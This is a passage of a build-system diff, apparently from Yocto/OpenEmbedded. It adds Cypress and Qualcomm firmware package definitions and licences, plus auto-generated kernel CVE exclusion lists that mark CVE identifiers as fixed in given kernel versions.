@@ -687,13 +759,22 @@ LICENSE_${PN}-cypress-license = "Firmware-cypress"
FILES_${PN}-cypress-license = "${nonarch_base_libdir}/firmware/LICENCE.cypress"
FILES_${PN}-bcm-0bb4-0306 = "${nonarch_base_libdir}/firmware/brcm/BCM-0bb4-0306.hcd"
-FILES_${PN}-bcm43340 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43340-sdio.*"
-FILES_${PN}-bcm43362 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43362-sdio.*"
-FILES_${PN}-bcm43430 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430-sdio.*"
-FILES_${PN}-bcm4354 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4354-sdio.bin"
-FILES_${PN}-bcm4356-pcie = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-pcie.*"
+FILES_${PN}-bcm43340 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43340-sdio.* \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac43340-sdio.*"
+FILES_${PN}-bcm43362 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43362-sdio.* \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac43362-sdio.*"
+FILES_${PN}-bcm43430 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac43430-sdio.* \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac43430-sdio.*"
+FILES_${PN}-bcm4354 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4354-sdio.bin \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac4354-sdio.bin \
+"
+FILES_${PN}-bcm4356-pcie = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4356-pcie.* \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac4356-pcie.* \
+"
FILES_${PN}-bcm4373 = "${nonarch_base_libdir}/firmware/brcm/brcmfmac4373-sdio.bin \
${nonarch_base_libdir}/firmware/brcm/brcmfmac4373.bin \
+ ${nonarch_base_libdir}/firmware/cypress/cyfmac4373-sdio.bin \
+ ${nonarch_base_libdir}/firmware/brcm/brcmfmac4373-sdio.clm_blob \
"
LICENSE_${PN}-bcm-0bb4-0306 = "Firmware-cypress"
@@ -893,27 +974,100 @@ RDEPENDS_${PN}-qat = "${PN}-qat-license"
# For QCOM VPU/GPU and SDM845
LICENSE_${PN}-qcom-license = "Firmware-qcom"
+LICENSE_${PN}-qcom-yamato-license = "Firmware-qcom-yamato"
+LICENSE_${PN}-qcom-venus-1.8 = "Firmware-qcom"
+LICENSE_${PN}-qcom-venus-4.2 = "Firmware-qcom"
+LICENSE_${PN}-qcom-venus-5.2 = "Firmware-qcom"
+LICENSE_${PN}-qcom-venus-5.4 = "Firmware-qcom"
+LICENSE_${PN}-qcom-vpu-1.0 = "Firmware-qcom"
+LICENSE_${PN}-qcom-vpu-2.0 = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a2xx = "Firmware-qcom Firmware-qcom-yamato"
+LICENSE_${PN}-qcom-adreno-a3xx = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a4xx = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a530 = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a630 = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a650 = "Firmware-qcom"
+LICENSE_${PN}-qcom-adreno-a660 = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8016-modem = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8016-wifi = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8096-audio = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8096-adreno = "Firmware-qcom"
+LICENSE_${PN}-qcom-apq8096-modem = "Firmware-qcom"
+LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "Firmware-qcom"
+LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "Firmware-qcom"
+LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "Firmware-qcom"
+LICENSE_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "Firmware-qcom"
+LICENSE_${PN}-qcom-sdm845-audio = "Firmware-qcom"
+LICENSE_${PN}-qcom-sdm845-adreno = "Firmware-qcom"
+LICENSE_${PN}-qcom-sdm845-compute = "Firmware-qcom"
+LICENSE_${PN}-qcom-sdm845-modem = "Firmware-qcom"
+LICENSE_${PN}-qcom-sm8250-audio = "Firmware-qcom"
+LICENSE_${PN}-qcom-sm8250-adreno = "Firmware-qcom"
+LICENSE_${PN}-qcom-sm8250-compute = "Firmware-qcom"
+
FILES_${PN}-qcom-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom ${nonarch_base_libdir}/firmware/qcom/NOTICE.txt"
+FILES_${PN}-qcom-yamato-license = "${nonarch_base_libdir}/firmware/LICENSE.qcom_yamato"
FILES_${PN}-qcom-venus-1.8 = "${nonarch_base_libdir}/firmware/qcom/venus-1.8/*"
FILES_${PN}-qcom-venus-4.2 = "${nonarch_base_libdir}/firmware/qcom/venus-4.2/*"
FILES_${PN}-qcom-venus-5.2 = "${nonarch_base_libdir}/firmware/qcom/venus-5.2/*"
FILES_${PN}-qcom-venus-5.4 = "${nonarch_base_libdir}/firmware/qcom/venus-5.4/*"
-FILES_${PN}-qcom-adreno-a3xx = "${nonarch_base_libdir}/firmware/qcom/a300_*.fw ${nonarch_base_libdir}/firmware/a300_*.fw"
-FILES_${PN}-qcom-adreno-a530 = "${nonarch_base_libdir}/firmware/qcom/a530*.*"
-FILES_${PN}-qcom-adreno-a630 = "${nonarch_base_libdir}/firmware/qcom/a630*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/a630*.*"
+FILES_${PN}-qcom-vpu-1.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-1.0/*"
+FILES_${PN}-qcom-vpu-2.0 = "${nonarch_base_libdir}/firmware/qcom/vpu-2.0/*"
+FILES_${PN}-qcom-adreno-a2xx = "${nonarch_base_libdir}/firmware/qcom/leia_*.fw ${nonarch_base_libdir}/firmware/qcom/yamato_*.fw"
+FILES_${PN}-qcom-adreno-a3xx = "${nonarch_base_libdir}/firmware/qcom/a3*_*.fw ${nonarch_base_libdir}/firmware/a300_*.fw"
+FILES_${PN}-qcom-adreno-a4xx = "${nonarch_base_libdir}/firmware/qcom/a4*_*.fw"
+FILES_${PN}-qcom-adreno-a530 = "${nonarch_base_libdir}/firmware/qcom/a530*.fw*"
+FILES_${PN}-qcom-adreno-a630 = "${nonarch_base_libdir}/firmware/qcom/a630*.*"
+FILES_${PN}-qcom-adreno-a650 = "${nonarch_base_libdir}/firmware/qcom/a650*.*"
+FILES_${PN}-qcom-adreno-a660 = "${nonarch_base_libdir}/firmware/qcom/a660*.*"
+FILES_${PN}-qcom-apq8016-modem = "${nonarch_base_libdir}/firmware/qcom/apq8016/mba.mbn ${nonarch_base_libdir}/firmware/qcom/apq8016/modem.mbn"
+FILES_${PN}-qcom-apq8016-wifi = "${nonarch_base_libdir}/firmware/qcom/apq8016/wcnss.mbn ${nonarch_base_libdir}/firmware/qcom/apq8016/WCNSS*"
+FILES_${PN}-qcom-apq8096-adreno = "${nonarch_base_libdir}/firmware/qcom/apq8096/a530_zap.mbn ${nonarch_base_libdir}/firmware/qcom/a530_zap.mdt"
+FILES_${PN}-qcom-apq8096-audio = "${nonarch_base_libdir}/firmware/qcom/apq8096/adsp*.*"
+FILES_${PN}-qcom-apq8096-modem = "${nonarch_base_libdir}/firmware/qcom/apq8096/mba.mbn ${nonarch_base_libdir}/firmware/qcom/apq8096/modem*.* ${nonarch_base_libdir}/firmware/qcom/apq8096/wlanmdsp.mbn"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-compat = "${nonarch_base_libdir}/firmware/qcom/LENOVO/21BX"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*adsp*.* ${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/battmgr.jsn"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/qcdxkmsuc8280.mbn"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*cdsp*.*"
+FILES_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${nonarch_base_libdir}/firmware/qcom/sc8280xp/LENOVO/21BX/*slpi*.*"
+FILES_${PN}-qcom-sdm845-adreno = "${nonarch_base_libdir}/firmware/qcom/sdm845/a630*.*"
FILES_${PN}-qcom-sdm845-audio = "${nonarch_base_libdir}/firmware/qcom/sdm845/adsp*.*"
FILES_${PN}-qcom-sdm845-compute = "${nonarch_base_libdir}/firmware/qcom/sdm845/cdsp*.*"
FILES_${PN}-qcom-sdm845-modem = "${nonarch_base_libdir}/firmware/qcom/sdm845/mba.mbn ${nonarch_base_libdir}/firmware/qcom/sdm845/modem*.* ${nonarch_base_libdir}/firmware/qcom/sdm845/wlanmdsp.mbn"
+FILES_${PN}-qcom-sm8250-adreno = "${nonarch_base_libdir}/firmware/qcom/sm8250/a650*.*"
+FILES_${PN}-qcom-sm8250-audio = "${nonarch_base_libdir}/firmware/qcom/sm8250/adsp*.*"
+FILES_${PN}-qcom-sm8250-compute = "${nonarch_base_libdir}/firmware/qcom/sm8250/cdsp*.*"
RDEPENDS_${PN}-qcom-venus-1.8 = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-venus-4.2 = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-venus-5.2 = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-venus-5.4 = "${PN}-qcom-license"
-RDEPENDS_${PN}-qcom-adreno-a3xx = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-vpu-1.0 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-vpu-2.0 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-adreno-a2xx = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-adreno-a2xx = "${PN}-qcom-license ${PN}-qcom-yamato-license"
+RDEPENDS_${PN}-qcom-adreno-a4xx = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-adreno-a530 = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-adreno-a630 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-adreno-a650 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-adreno-a660 = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-apq8016-modem = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-apq8016-wifi = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-apq8096-audio = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-apq8096-modem = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-sdm845-audio = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-sdm845-compute = "${PN}-qcom-license"
RDEPENDS_${PN}-qcom-sdm845-modem = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sm8250-audio = "${PN}-qcom-license"
+RDEPENDS_${PN}-qcom-sm8250-compute = "${PN}-qcom-license"
+
+RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-audio = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
+RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-adreno = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
+RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-compute = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
+RRECOMMENDS_${PN}-qcom-sc8280xp-lenovo-x13s-sensors = "${PN}-qcom-sc8280xp-lenovo-x13s-compat"
FILES_${PN}-liquidio = "${nonarch_base_libdir}/firmware/liquidio"
@@ -942,7 +1096,6 @@ LICENSE_${PN} = "\
& Firmware-fw_sst_0f28 \
& Firmware-go7007 \
& Firmware-hfi1_firmware \
- & Firmware-i2400m \
& Firmware-ibt_firmware \
& Firmware-it913x \
& Firmware-IntcSST2 \
@@ -963,7 +1116,6 @@ LICENSE_${PN} = "\
& Firmware-ralink-firmware \
& Firmware-imx-sdma_firmware \
& Firmware-siano \
- & Firmware-tda7706-firmware \
& Firmware-ti-connectivity \
& Firmware-ti-keystone \
& Firmware-ueagle-atm4-firmware \
@@ -996,3 +1148,6 @@ python populate_packages_prepend () {
# Firmware files are generally not ran on the CPU, so they can be
# allarch despite being architecture specific
INSANE_SKIP = "arch"
+
+# Don't warn about already stripped files
+INSANE_SKIP:${PN} = "already-stripped"
diff --git a/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc b/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc
index 4ad74a27e9..2d4429b6b4 100644
--- a/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc
+++ b/meta/recipes-kernel/linux-libc-headers/linux-libc-headers.inc
@@ -1,4 +1,6 @@
SUMMARY = "Sanitized set of kernel headers for the C library's use"
+HOMEPAGE = "https://www.kernel.org/"
+DESCRIPTION = "Designed to maintain an Application Programming Interface (API) stable version of the Linux headers"
SECTION = "devel"
LICENSE = "GPLv2"
diff --git a/meta/recipes-kernel/linux/cve-exclusion.inc b/meta/recipes-kernel/linux/cve-exclusion.inc
new file mode 100644
index 0000000000..efc8b09475
--- /dev/null
+++ b/meta/recipes-kernel/linux/cve-exclusion.inc
@@ -0,0 +1,13 @@
+# Kernel CVE exclusion file
+
+# https://nvd.nist.gov/vuln/detail/CVE-2020-29373
+# Patched in kernel since v5.6 ff002b30181d30cdfbca316dadd099c3ca0d739c
+# Backported in version v5.4.24 cac68d12c531aa3010509a5a55a5dfd18dedaa80
+CVE_CHECK_WHITELIST += "CVE-2020-29373"
+
+# https://nvd.nist.gov/vuln/detail/CVE-2022-39188
+# Patched in kernel since v5.19 b67fbebd4cf980aecbcc750e1462128bffe8ae15
+# Backported in version v5.4.212 c9c5501e815132530d741ec9fdd22657f91656bc
+# Backported in version v5.10.141 895428ee124ad70b9763259308354877b725c31d
+# Backported in version v5.15.65 3ffb97fce282df03723995f5eed6a559d008078e
+CVE_CHECK_WHITELIST += "CVE-2022-39188"
diff --git a/meta/recipes-kernel/linux/cve-exclusion_5.4.inc b/meta/recipes-kernel/linux/cve-exclusion_5.4.inc
new file mode 100644
index 0000000000..b0b33bcc1d
--- /dev/null
+++ b/meta/recipes-kernel/linux/cve-exclusion_5.4.inc
@@ -0,0 +1,9445 @@
+
+# Auto-generated CVE metadata, DO NOT EDIT BY HAND.
+# Generated at 2024-04-14 04:45:05.585211 for version 5.4.273
+
+python check_kernel_cve_status_version() {
+ this_version = "5.4.273"
+ kernel_version = d.getVar("LINUX_VERSION")
+ if kernel_version != this_version:
+ bb.warn("Kernel CVE status needs updating: generated for %s but kernel is %s" % (this_version, kernel_version))
+}
+do_cve_check[prefuncs] += "check_kernel_cve_status_version"
+
+# fixed-version: Fixed after version 2.6.12rc2
+CVE_CHECK_WHITELIST += "CVE-2003-1604"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2004-0230"
+
+# CVE-2005-3660 has no known resolution
+
+# fixed-version: Fixed after version 2.6.26rc5
+CVE_CHECK_WHITELIST += "CVE-2006-3635"
+
+# fixed-version: Fixed after version 2.6.19rc3
+CVE_CHECK_WHITELIST += "CVE-2006-5331"
+
+# fixed-version: Fixed after version 2.6.19rc2
+CVE_CHECK_WHITELIST += "CVE-2006-6128"
+
+# CVE-2007-3719 has no known resolution
+
+# fixed-version: Fixed after version 2.6.12rc2
+CVE_CHECK_WHITELIST += "CVE-2007-4774"
+
+# fixed-version: Fixed after version 2.6.24rc6
+CVE_CHECK_WHITELIST += "CVE-2007-6761"
+
+# fixed-version: Fixed after version 2.6.20rc5
+CVE_CHECK_WHITELIST += "CVE-2007-6762"
+
+# CVE-2008-2544 has no known resolution
+
+# CVE-2008-4609 has no known resolution
+
+# fixed-version: Fixed after version 2.6.25rc1
+CVE_CHECK_WHITELIST += "CVE-2008-7316"
+
+# fixed-version: Fixed after version 2.6.31rc6
+CVE_CHECK_WHITELIST += "CVE-2009-2692"
+
+# fixed-version: Fixed after version 2.6.23rc9
+CVE_CHECK_WHITELIST += "CVE-2010-0008"
+
+# fixed-version: Fixed after version 2.6.36rc5
+CVE_CHECK_WHITELIST += "CVE-2010-3432"
+
+# CVE-2010-4563 has no known resolution
+
+# fixed-version: Fixed after version 2.6.37rc6
+CVE_CHECK_WHITELIST += "CVE-2010-4648"
+
+# fixed-version: Fixed after version 2.6.38rc1
+CVE_CHECK_WHITELIST += "CVE-2010-5313"
+
+# CVE-2010-5321 has no known resolution
+
+# fixed-version: Fixed after version 2.6.35rc1
+CVE_CHECK_WHITELIST += "CVE-2010-5328"
+
+# fixed-version: Fixed after version 2.6.39rc1
+CVE_CHECK_WHITELIST += "CVE-2010-5329"
+
+# fixed-version: Fixed after version 2.6.34rc7
+CVE_CHECK_WHITELIST += "CVE-2010-5331"
+
+# fixed-version: Fixed after version 2.6.37rc1
+CVE_CHECK_WHITELIST += "CVE-2010-5332"
+
+# fixed-version: Fixed after version 3.2rc1
+CVE_CHECK_WHITELIST += "CVE-2011-4098"
+
+# fixed-version: Fixed after version 3.3rc1
+CVE_CHECK_WHITELIST += "CVE-2011-4131"
+
+# fixed-version: Fixed after version 3.2rc1
+CVE_CHECK_WHITELIST += "CVE-2011-4915"
+
+# CVE-2011-4916 has no known resolution
+
+# CVE-2011-4917 has no known resolution
+
+# fixed-version: Fixed after version 3.2rc1
+CVE_CHECK_WHITELIST += "CVE-2011-5321"
+
+# fixed-version: Fixed after version 3.1rc1
+CVE_CHECK_WHITELIST += "CVE-2011-5327"
+
+# fixed-version: Fixed after version 3.7rc2
+CVE_CHECK_WHITELIST += "CVE-2012-0957"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2119"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2136"
+
+# fixed-version: Fixed after version 3.5rc2
+CVE_CHECK_WHITELIST += "CVE-2012-2137"
+
+# fixed-version: Fixed after version 3.4rc6
+CVE_CHECK_WHITELIST += "CVE-2012-2313"
+
+# fixed-version: Fixed after version 3.4rc6
+CVE_CHECK_WHITELIST += "CVE-2012-2319"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2012-2372"
+
+# fixed-version: Fixed after version 3.4rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2375"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2390"
+
+# fixed-version: Fixed after version 3.5rc4
+CVE_CHECK_WHITELIST += "CVE-2012-2669"
+
+# fixed-version: Fixed after version 2.6.34rc1
+CVE_CHECK_WHITELIST += "CVE-2012-2744"
+
+# fixed-version: Fixed after version 3.4rc3
+CVE_CHECK_WHITELIST += "CVE-2012-2745"
+
+# fixed-version: Fixed after version 3.5rc6
+CVE_CHECK_WHITELIST += "CVE-2012-3364"
+
+# fixed-version: Fixed after version 3.4rc5
+CVE_CHECK_WHITELIST += "CVE-2012-3375"
+
+# fixed-version: Fixed after version 3.5rc5
+CVE_CHECK_WHITELIST += "CVE-2012-3400"
+
+# fixed-version: Fixed after version 3.6rc2
+CVE_CHECK_WHITELIST += "CVE-2012-3412"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-3430"
+
+# fixed-version: Fixed after version 2.6.19rc4
+CVE_CHECK_WHITELIST += "CVE-2012-3510"
+
+# fixed-version: Fixed after version 3.5rc6
+CVE_CHECK_WHITELIST += "CVE-2012-3511"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-3520"
+
+# fixed-version: Fixed after version 3.0rc1
+CVE_CHECK_WHITELIST += "CVE-2012-3552"
+
+# Skipping CVE-2012-4220, no affected_versions
+
+# Skipping CVE-2012-4221, no affected_versions
+
+# Skipping CVE-2012-4222, no affected_versions
+
+# fixed-version: Fixed after version 3.4rc1
+CVE_CHECK_WHITELIST += "CVE-2012-4398"
+
+# fixed-version: Fixed after version 2.6.36rc4
+CVE_CHECK_WHITELIST += "CVE-2012-4444"
+
+# fixed-version: Fixed after version 3.7rc6
+CVE_CHECK_WHITELIST += "CVE-2012-4461"
+
+# fixed-version: Fixed after version 3.6rc5
+CVE_CHECK_WHITELIST += "CVE-2012-4467"
+
+# fixed-version: Fixed after version 3.7rc3
+CVE_CHECK_WHITELIST += "CVE-2012-4508"
+
+# fixed-version: Fixed after version 3.8rc1
+CVE_CHECK_WHITELIST += "CVE-2012-4530"
+
+# CVE-2012-4542 has no known resolution
+
+# fixed-version: Fixed after version 3.7rc4
+CVE_CHECK_WHITELIST += "CVE-2012-4565"
+
+# fixed-version: Fixed after version 3.8rc1
+CVE_CHECK_WHITELIST += "CVE-2012-5374"
+
+# fixed-version: Fixed after version 3.8rc1
+CVE_CHECK_WHITELIST += "CVE-2012-5375"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-5517"
+
+# fixed-version: Fixed after version 3.6rc7
+CVE_CHECK_WHITELIST += "CVE-2012-6536"
+
+# fixed-version: Fixed after version 3.6rc7
+CVE_CHECK_WHITELIST += "CVE-2012-6537"
+
+# fixed-version: Fixed after version 3.6rc7
+CVE_CHECK_WHITELIST += "CVE-2012-6538"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6539"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6540"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6541"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6542"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6543"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6544"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6545"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2012-6546"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6547"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6548"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6549"
+
+# fixed-version: Fixed after version 3.3rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6638"
+
+# fixed-version: Fixed after version 3.6rc2
+CVE_CHECK_WHITELIST += "CVE-2012-6647"
+
+# fixed-version: Fixed after version 3.6
+CVE_CHECK_WHITELIST += "CVE-2012-6657"
+
+# fixed-version: Fixed after version 3.6rc5
+CVE_CHECK_WHITELIST += "CVE-2012-6689"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6701"
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6703"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6704"
+
+# fixed-version: Fixed after version 3.4rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6712"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-0160"
+
+# fixed-version: Fixed after version 3.8rc5
+CVE_CHECK_WHITELIST += "CVE-2013-0190"
+
+# fixed-version: Fixed after version 3.8rc7
+CVE_CHECK_WHITELIST += "CVE-2013-0216"
+
+# fixed-version: Fixed after version 3.8rc7
+CVE_CHECK_WHITELIST += "CVE-2013-0217"
+
+# fixed-version: Fixed after version 3.8
+CVE_CHECK_WHITELIST += "CVE-2013-0228"
+
+# fixed-version: Fixed after version 3.8rc7
+CVE_CHECK_WHITELIST += "CVE-2013-0231"
+
+# fixed-version: Fixed after version 3.8rc6
+CVE_CHECK_WHITELIST += "CVE-2013-0268"
+
+# fixed-version: Fixed after version 3.8
+CVE_CHECK_WHITELIST += "CVE-2013-0290"
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2013-0309"
+
+# fixed-version: Fixed after version 3.5
+CVE_CHECK_WHITELIST += "CVE-2013-0310"
+
+# fixed-version: Fixed after version 3.7rc8
+CVE_CHECK_WHITELIST += "CVE-2013-0311"
+
+# fixed-version: Fixed after version 3.8rc5
+CVE_CHECK_WHITELIST += "CVE-2013-0313"
+
+# fixed-version: Fixed after version 3.11rc7
+CVE_CHECK_WHITELIST += "CVE-2013-0343"
+
+# fixed-version: Fixed after version 3.8rc6
+CVE_CHECK_WHITELIST += "CVE-2013-0349"
+
+# fixed-version: Fixed after version 3.8rc5
+CVE_CHECK_WHITELIST += "CVE-2013-0871"
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-0913"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-0914"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1059"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1763"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1767"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1772"
+
+# fixed-version: Fixed after version 3.3rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1773"
+
+# fixed-version: Fixed after version 3.8rc5
+CVE_CHECK_WHITELIST += "CVE-2013-1774"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1792"
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-1796"
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-1797"
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-1798"
+
+# fixed-version: Fixed after version 3.8rc6
+CVE_CHECK_WHITELIST += "CVE-2013-1819"
+
+# fixed-version: Fixed after version 3.6rc7
+CVE_CHECK_WHITELIST += "CVE-2013-1826"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1827"
+
+# fixed-version: Fixed after version 3.9rc2
+CVE_CHECK_WHITELIST += "CVE-2013-1828"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1848"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1858"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1860"
+
+# fixed-version: Fixed after version 3.7rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1928"
+
+# fixed-version: Fixed after version 3.9rc6
+CVE_CHECK_WHITELIST += "CVE-2013-1929"
+
+# Skipping CVE-2013-1935, no affected_versions
+
+# fixed-version: Fixed after version 3.0rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1943"
+
+# fixed-version: Fixed after version 3.9rc5
+CVE_CHECK_WHITELIST += "CVE-2013-1956"
+
+# fixed-version: Fixed after version 3.9rc5
+CVE_CHECK_WHITELIST += "CVE-2013-1957"
+
+# fixed-version: Fixed after version 3.9rc5
+CVE_CHECK_WHITELIST += "CVE-2013-1958"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-1959"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-1979"
+
+# fixed-version: Fixed after version 3.8rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2015"
+
+# fixed-version: Fixed after version 2.6.34
+CVE_CHECK_WHITELIST += "CVE-2013-2017"
+
+# fixed-version: Fixed after version 3.8rc4
+CVE_CHECK_WHITELIST += "CVE-2013-2058"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-2094"
+
+# fixed-version: Fixed after version 2.6.34rc4
+CVE_CHECK_WHITELIST += "CVE-2013-2128"
+
+# fixed-version: Fixed after version 3.11rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2140"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-2141"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-2146"
+
+# fixed-version: Fixed after version 3.12rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2147"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2148"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2164"
+
+# Skipping CVE-2013-2188, no affected_versions
+
+# fixed-version: Fixed after version 3.9rc4
